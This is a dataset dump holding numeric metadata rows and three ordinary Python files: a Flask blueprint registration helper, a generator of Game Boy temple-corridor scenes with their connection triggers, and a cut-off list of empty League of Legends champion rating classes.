| 0.86469
| 0.850665
| 0.844689
| 0.83425
| 0.822695
| 0
| 0.049779
| 0.278006
| 22,593
| 488
| 118
| 46.297131
| 0.719532
| 0.025096
| 0
| 0.728767
| 0
| 0
| 0.009015
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0
| 0.008219
| 0
| 0.063014
| 0.005479
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc36c05e9d3f1f4b8edbae327901dfb07ee206e6
| 182
|
py
|
Python
|
ndopapp/yourdetails/__init__.py
|
nhsconnect/ndop-nojs
|
ad049db27650e850742a3bd466f96d36a3420589
|
[
"MIT"
] | null | null | null |
ndopapp/yourdetails/__init__.py
|
nhsconnect/ndop-nojs
|
ad049db27650e850742a3bd466f96d36a3420589
|
[
"MIT"
] | null | null | null |
ndopapp/yourdetails/__init__.py
|
nhsconnect/ndop-nojs
|
ad049db27650e850742a3bd466f96d36a3420589
|
[
"MIT"
] | 2
|
2019-04-11T14:21:33.000Z
|
2021-04-11T07:29:43.000Z
|
def create_module(app, **kwargs):
from .controllers import yourdetails_blueprint
app.register_blueprint(yourdetails_blueprint, url_prefix=app.config.get("URL_PREFIX"))
| 30.333333
| 90
| 0.774725
| 22
| 182
| 6.136364
| 0.681818
| 0.296296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126374
| 182
| 5
| 91
| 36.4
| 0.849057
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
cc59e71cba549332904e8e96850e46c46a2a0299
| 25,419
|
py
|
Python
|
rom_generator/scenes/imported/TempleCorridor.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | 3
|
2021-08-07T03:38:02.000Z
|
2021-09-17T14:33:27.000Z
|
rom_generator/scenes/imported/TempleCorridor.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
rom_generator/scenes/imported/TempleCorridor.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
# Generated Scene Functions
# TempleCorridor.py
from rom_generator import generator
from rom_generator import script_functions as script
test_generation_destination_path = "../gbprojects/generated_export_test_TempleCorridor/"
def scene_generation():
sprite_sheet_data = [
generator.makeSpriteSheet('actor.png', name='actor', type='actor', frames=3),
generator.makeSpriteSheet('actor_animated.png', name='actor_animated', type='actor_animated', frames=6),
generator.makeSpriteSheet('static.png', name='static', type='static', frames=1)]
def findSpriteByName(sprite_name):
'''
Returns first sprite that matches the name given.
'''
try:
return [s for s in sprite_sheet_data if (s['name'] == sprite_name)][0]
except:
return None
def getBySceneLabel(scene_label):
'''
This is mostly here so we can get the matching scene from the original
template data. As used here it just grabs the first scene that was made
from that template, so if the template is used more than once it won't
behave as expected and you should generate a proper relationship instad.
'''
s_id = generator.getSceneIdByLabel(scene_label)
if s_id == None:
return '<♔' + scene_label + '♔>'
return s_id
def scene_gen_temple_corridor_01_00001(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 10, 4, 10, 1)
trigger_01 = generator.makeTrigger('trigger_01', 0, 14, 1, 4)
trigger_02 = generator.makeTrigger('trigger_02', 29, 16, 1, 2)
trigger_03 = generator.makeTrigger('trigger_03', 4, 0, 2, 1)
trigger_04 = generator.makeTrigger('trigger_04', 23, 0, 3, 1)
trigger_list = []
collision_data_list = [207, 255, 127, 252, 195, 255, 15, 31, 240, 255, 3, 7, 252, 255, 192, 1, 51, 51, 112, 192, 204, 12, 28, 48, 51, 3, 7, 204, 204, 192, 1, 0, 0, 112, 0, 0, 0, 28, 0, 0, 0, 7, 0, 0, 192, 1, 0, 0, 112, 0, 0, 0, 12, 0, 0, 0, 3, 0, 0, 192, 0, 0, 0, 0, 0, 0, 0, 0]
gen_scene_bkg = generator.makeBackground("corridors_01.png")
gen_scene_scn = generator.makeScene("_gen_temple_corridor_01", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_temple_corridor_01_00001")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (14, 5), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (10, 4), 'entrance_size': (10, 1) }, 'tags': ['B'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (1, 16), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 14), 'entrance_size': (1, 4) }, 'tags': ['B'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (27, 17), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (29, 16), 'entrance_size': (1, 2) }, 'tags': ['B'] }
def addConnection_03(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_03 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_03['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_03
connection_03 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_03, 'args': { 'exit_location': (4, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (4, 0), 'entrance_size': (2, 1) }, 'tags': ['B'] }
def addConnection_04(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_04 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_04['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_04
connection_04 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_04, 'args': { 'exit_location': (24, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (23, 0), 'entrance_size': (3, 1) }, 'tags': ['B'] }
gen_scene_connections = [connection_00, connection_01, connection_02, connection_03, connection_04]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Temple"]}
return scene_data
def scene_gen_temple_corridor_02_00002(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 6, 5, 8, 1)
trigger_01 = generator.makeTrigger('trigger_01', 8, 29, 4, 1)
trigger_list = []
collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 3, 252, 3, 0, 60, 0, 192, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255]
gen_scene_bkg = generator.makeBackground("corridors_02.png")
gen_scene_scn = generator.makeScene("_gen_temple_corridor_02", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_temple_corridor_02_00002")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (9, 6), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (6, 5), 'entrance_size': (8, 1) }, 'tags': ['B'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (9, 28), 'exit_direction': 'up', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 29), 'entrance_size': (4, 1) }, 'tags': ['B'] }
gen_scene_connections = [connection_00, connection_01]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Temple"]}
return scene_data
def scene_gen_temple_corridor_03_00003(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 8, 5, 4, 1)
trigger_01 = generator.makeTrigger('trigger_01', 0, 18, 1, 4)
trigger_02 = generator.makeTrigger('trigger_02', 6, 29, 10, 1)
trigger_list = []
collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 15, 255, 207, 48, 255, 12, 243, 207, 48, 255, 12, 243, 207, 48, 63, 0, 192, 3, 0, 60, 0, 192, 3, 0, 60, 0, 192, 3, 0, 60, 0, 192, 0, 0, 15, 0, 240, 0, 0, 15, 0, 240, 3, 51, 63, 48, 243, 3, 51, 63, 48, 243, 63, 0, 255, 3, 240, 63, 0, 255, 3, 240]
gen_scene_bkg = generator.makeBackground("corridors_03.png")
gen_scene_scn = generator.makeScene("_gen_temple_corridor_03", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_temple_corridor_03_00003")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (9, 6), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (8, 5), 'entrance_size': (4, 1) }, 'tags': ['B'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (1, 20), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 18), 'entrance_size': (1, 4) }, 'tags': ['B'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (10, 28), 'exit_direction': 'up', 'entrance': gen_scene_scn['id'], 'entrance_location': (6, 29), 'entrance_size': (10, 1) }, 'tags': ['B'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Temple"]}
return scene_data
def scene_gen_temple_corridor_04_00004(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 0, 6, 1, 10)
trigger_01 = generator.makeTrigger('trigger_01', 29, 6, 1, 10)
trigger_02 = generator.makeTrigger('trigger_02', 18, 5, 2, 1)
trigger_list = []
collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 252, 15, 12, 12, 12, 0, 3, 3, 3, 192, 192, 192, 0, 48, 48, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 63]
gen_scene_bkg = generator.makeBackground("corridors_04.png")
gen_scene_scn = generator.makeScene("_gen_temple_corridor_04", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_temple_corridor_04_00004")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (1, 11), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 6), 'entrance_size': (1, 10) }, 'tags': ['B'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (27, 11), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (29, 6), 'entrance_size': (1, 10) }, 'tags': ['B'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (18, 6), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (18, 5), 'entrance_size': (2, 1) }, 'tags': ['B'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Temple"]}
return scene_data
def scene_gen_temple_corridor_05_00005(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 0, 3, 1, 8)
trigger_01 = generator.makeTrigger('trigger_01', 17, 0, 6, 1)
trigger_02 = generator.makeTrigger('trigger_02', 7, 2, 2, 1)
trigger_list = []
collision_data_list = [255, 255, 129, 224, 255, 127, 32, 248, 231, 31, 8, 2, 0, 0, 130, 0, 0, 128, 32, 0, 0, 32, 8, 0, 0, 8, 2, 0, 0, 130, 0, 0, 128, 32, 0, 0, 32, 8, 0, 0, 8, 254, 255, 255, 131, 255, 127, 248, 224, 255, 31, 62, 248, 255, 135, 15, 2, 0, 0, 128, 0, 0, 0, 32, 0, 0, 0, 8]
gen_scene_bkg = generator.makeBackground("corridors_05.png")
gen_scene_scn = generator.makeScene("_gen_temple_corridor_05", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_temple_corridor_05_00005")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (1, 8), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 3), 'entrance_size': (1, 8) }, 'tags': ['A'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (19, 1), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (17, 0), 'entrance_size': (6, 1) }, 'tags': ['A'] }
def addConnection_02(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_02 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_02['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_02
connection_02 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_02, 'args': { 'exit_location': (7, 3), 'exit_direction': 'down', 'entrance': gen_scene_scn['id'], 'entrance_location': (7, 2), 'entrance_size': (2, 1) }, 'tags': ['A'] }
gen_scene_connections = [connection_00, connection_01, connection_02]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Temple"]}
return scene_data
def scene_gen_temple_corridor_06_00006(callback):
actor_name_table = {}
actor_list = []
trigger_00 = generator.makeTrigger('trigger_00', 0, 6, 1, 13)
trigger_01 = generator.makeTrigger('trigger_01', 19, 6, 1, 13)
trigger_list = []
collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 240, 15, 255, 255, 240, 255, 15, 255, 255, 240, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
gen_scene_bkg = generator.makeBackground("corridors_06.png")
gen_scene_scn = generator.makeScene("_gen_temple_corridor_06", gen_scene_bkg, collisions=collision_data_list, actors=actor_list, triggers=trigger_list, scene_label="scene_gen_temple_corridor_06_00006")
def addConnection_00(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_00 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_00['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_00
connection_00 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_00, 'args': { 'exit_location': (1, 16), 'exit_direction': 'right', 'entrance': gen_scene_scn['id'], 'entrance_location': (0, 6), 'entrance_size': (1, 13) }, 'tags': ['B'] }
def addConnection_01(source_location, source_size, destination_scene_id, destination_location, destination_direction):
trigger_01 = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
trigger_01['script'] = [
script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
script.end()
]
return trigger_01
connection_01 = {'type': 'SLOT_CONNECTION', 'creator': addConnection_01, 'args': { 'exit_location': (17, 7), 'exit_direction': 'left', 'entrance': gen_scene_scn['id'], 'entrance_location': (19, 6), 'entrance_size': (1, 13) }, 'tags': ['B'] }
gen_scene_connections = [connection_00, connection_01]
scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Temple"]}
return scene_data
def catalog():
"""
Returns a list of scene functions from this part of the library.
"""
return [scene_gen_temple_corridor_01_00001,
scene_gen_temple_corridor_02_00002,
scene_gen_temple_corridor_03_00003,
#scene_gen_temple_corridor_04_00004, # removed because I used it for SaveTheWorld
scene_gen_temple_corridor_05_00005,
#scene_gen_temple_corridor_06_00006 # removed because I used it for SaveTheWorld
]
return catalog, sprite_sheet_data
def createExampleProject():
"""
Demonstration of how the scene generators in this file can be used.
"""
project = generator.makeBasicProject()
# Create sprite sheet for the player sprite
player_sprite_sheet = generator.addSpriteSheet(project, "actor_animated.png", "actor_animated", "actor_animated")
project.settings["playerSpriteSheetId"] = player_sprite_sheet["id"]
scene_data_list = []
catalog, sprites = scene_generation()
for scn_func in catalog():
scene_data_list.append(scn_func(None))
for element_sprite in sprites:
project.spriteSheets.append(element_sprite)
generator.connectScenesRandomlySymmetric(scene_data_list)
for sdata in scene_data_list:
generator.addSceneData(project, generator.translateReferences(sdata, scene_data_list))
# Add some music
project.music.append(generator.makeMusic("template", "template.mod"))
# Set the starting scene
project.settings["startSceneId"] = project.scenes[0]["id"]
project.settings["startX"] = 7
project.settings["startY"] = 21
return project
def runTest(test_dir):
generator.initializeGenerator()
project = createExampleProject()
generator.writeProjectToDisk(project, output_path = test_dir)
# test creating scenes...
if __name__ == '__main__':
destination = test_generation_destination_path
runTest(destination)
| 71.201681
| 386
| 0.660018
| 3,156
| 25,419
| 5.024715
| 0.075412
| 0.033674
| 0.039728
| 0.049187
| 0.840207
| 0.824253
| 0.776517
| 0.766427
| 0.754572
| 0.730988
| 0
| 0.087988
| 0.205476
| 25,419
| 356
| 387
| 71.401685
| 0.697118
| 0.030489
| 0
| 0.496324
| 1
| 0
| 0.147373
| 0.01626
| 0
| 0
| 0
| 0
| 0
| 1
| 0.110294
| false
| 0
| 0.007353
| 0
| 0.231618
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc8f631e0bfc20e58063cd540db728376616ec27
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_rakan/na_rakan_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_rakan/na_rakan_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_rakan/na_rakan_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Rakan_Bot_Aatrox(Ratings):
pass
class NA_Rakan_Bot_Ahri(Ratings):
pass
class NA_Rakan_Bot_Akali(Ratings):
pass
class NA_Rakan_Bot_Alistar(Ratings):
pass
class NA_Rakan_Bot_Amumu(Ratings):
pass
class NA_Rakan_Bot_Anivia(Ratings):
pass
class NA_Rakan_Bot_Annie(Ratings):
pass
class NA_Rakan_Bot_Ashe(Ratings):
pass
class NA_Rakan_Bot_AurelionSol(Ratings):
pass
class NA_Rakan_Bot_Azir(Ratings):
pass
class NA_Rakan_Bot_Bard(Ratings):
pass
class NA_Rakan_Bot_Blitzcrank(Ratings):
pass
class NA_Rakan_Bot_Brand(Ratings):
pass
class NA_Rakan_Bot_Braum(Ratings):
pass
class NA_Rakan_Bot_Caitlyn(Ratings):
pass
class NA_Rakan_Bot_Camille(Ratings):
pass
class NA_Rakan_Bot_Cassiopeia(Ratings):
pass
class NA_Rakan_Bot_Chogath(Ratings):
pass
class NA_Rakan_Bot_Corki(Ratings):
pass
class NA_Rakan_Bot_Darius(Ratings):
pass
class NA_Rakan_Bot_Diana(Ratings):
pass
class NA_Rakan_Bot_Draven(Ratings):
pass
class NA_Rakan_Bot_DrMundo(Ratings):
pass
class NA_Rakan_Bot_Ekko(Ratings):
pass
class NA_Rakan_Bot_Elise(Ratings):
pass
class NA_Rakan_Bot_Evelynn(Ratings):
pass
class NA_Rakan_Bot_Ezreal(Ratings):
pass
class NA_Rakan_Bot_Fiddlesticks(Ratings):
pass
class NA_Rakan_Bot_Fiora(Ratings):
pass
class NA_Rakan_Bot_Fizz(Ratings):
pass
class NA_Rakan_Bot_Galio(Ratings):
pass
class NA_Rakan_Bot_Gangplank(Ratings):
pass
class NA_Rakan_Bot_Garen(Ratings):
pass
class NA_Rakan_Bot_Gnar(Ratings):
pass
class NA_Rakan_Bot_Gragas(Ratings):
pass
class NA_Rakan_Bot_Graves(Ratings):
pass
class NA_Rakan_Bot_Hecarim(Ratings):
pass
class NA_Rakan_Bot_Heimerdinger(Ratings):
pass
class NA_Rakan_Bot_Illaoi(Ratings):
pass
class NA_Rakan_Bot_Irelia(Ratings):
pass
class NA_Rakan_Bot_Ivern(Ratings):
pass
class NA_Rakan_Bot_Janna(Ratings):
pass
class NA_Rakan_Bot_JarvanIV(Ratings):
pass
class NA_Rakan_Bot_Jax(Ratings):
pass
class NA_Rakan_Bot_Jayce(Ratings):
pass
class NA_Rakan_Bot_Jhin(Ratings):
pass
class NA_Rakan_Bot_Jinx(Ratings):
pass
class NA_Rakan_Bot_Kalista(Ratings):
pass
class NA_Rakan_Bot_Karma(Ratings):
pass
class NA_Rakan_Bot_Karthus(Ratings):
pass
class NA_Rakan_Bot_Kassadin(Ratings):
pass
class NA_Rakan_Bot_Katarina(Ratings):
pass
class NA_Rakan_Bot_Kayle(Ratings):
pass
class NA_Rakan_Bot_Kayn(Ratings):
pass
class NA_Rakan_Bot_Kennen(Ratings):
pass
class NA_Rakan_Bot_Khazix(Ratings):
pass
class NA_Rakan_Bot_Kindred(Ratings):
pass
class NA_Rakan_Bot_Kled(Ratings):
pass
class NA_Rakan_Bot_KogMaw(Ratings):
pass
class NA_Rakan_Bot_Leblanc(Ratings):
pass
class NA_Rakan_Bot_LeeSin(Ratings):
pass
class NA_Rakan_Bot_Leona(Ratings):
pass
class NA_Rakan_Bot_Lissandra(Ratings):
pass
class NA_Rakan_Bot_Lucian(Ratings):
pass
class NA_Rakan_Bot_Lulu(Ratings):
pass
class NA_Rakan_Bot_Lux(Ratings):
pass
class NA_Rakan_Bot_Malphite(Ratings):
pass
class NA_Rakan_Bot_Malzahar(Ratings):
pass
class NA_Rakan_Bot_Maokai(Ratings):
pass
class NA_Rakan_Bot_MasterYi(Ratings):
pass
class NA_Rakan_Bot_MissFortune(Ratings):
pass
class NA_Rakan_Bot_MonkeyKing(Ratings):
pass
class NA_Rakan_Bot_Mordekaiser(Ratings):
pass
class NA_Rakan_Bot_Morgana(Ratings):
pass
class NA_Rakan_Bot_Nami(Ratings):
pass
class NA_Rakan_Bot_Nasus(Ratings):
pass
class NA_Rakan_Bot_Nautilus(Ratings):
pass
class NA_Rakan_Bot_Nidalee(Ratings):
pass
class NA_Rakan_Bot_Nocturne(Ratings):
pass
class NA_Rakan_Bot_Nunu(Ratings):
pass
class NA_Rakan_Bot_Olaf(Ratings):
pass
class NA_Rakan_Bot_Orianna(Ratings):
pass
class NA_Rakan_Bot_Ornn(Ratings):
pass
class NA_Rakan_Bot_Pantheon(Ratings):
pass
class NA_Rakan_Bot_Poppy(Ratings):
pass
class NA_Rakan_Bot_Quinn(Ratings):
pass
class NA_Rakan_Bot_Rakan(Ratings):
pass
class NA_Rakan_Bot_Rammus(Ratings):
pass
class NA_Rakan_Bot_RekSai(Ratings):
pass
class NA_Rakan_Bot_Renekton(Ratings):
pass
class NA_Rakan_Bot_Rengar(Ratings):
pass
class NA_Rakan_Bot_Riven(Ratings):
pass
class NA_Rakan_Bot_Rumble(Ratings):
pass
class NA_Rakan_Bot_Ryze(Ratings):
pass
class NA_Rakan_Bot_Sejuani(Ratings):
pass
class NA_Rakan_Bot_Shaco(Ratings):
pass
class NA_Rakan_Bot_Shen(Ratings):
pass
